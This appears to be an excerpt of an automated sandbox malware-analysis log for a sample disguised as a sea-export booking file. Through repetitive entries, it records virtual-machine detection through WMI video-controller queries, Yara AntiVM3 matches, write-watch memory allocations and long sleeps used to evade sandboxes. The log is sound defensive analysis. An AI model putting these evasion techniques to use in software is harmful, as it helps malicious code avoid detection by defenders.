Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe PID: 3300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BhTdjGetAH.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 2132, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 1460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 4FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 7AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 8AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 8C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 9C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 9F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: AF80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 8C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 9F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: AF80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 1260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 2D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 4D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 2800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 6D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 7D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 7EF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 8EF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 9200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: A200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: B200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: C4E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: D4E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: DAF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: EAF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 1050000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 29A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 49A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 2E70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 3070000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 5070000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 7720000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 8720000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 88B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 98B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 9BC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: ABC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 88B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 9BC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: ABC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 2830000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 2A00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 4A00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 1090000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 29F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 49F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 70B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 80B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 8240000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 9240000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 9550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: A550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 8240000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 9550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: A550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 11C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 2CA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 4CA0000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\XClient.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

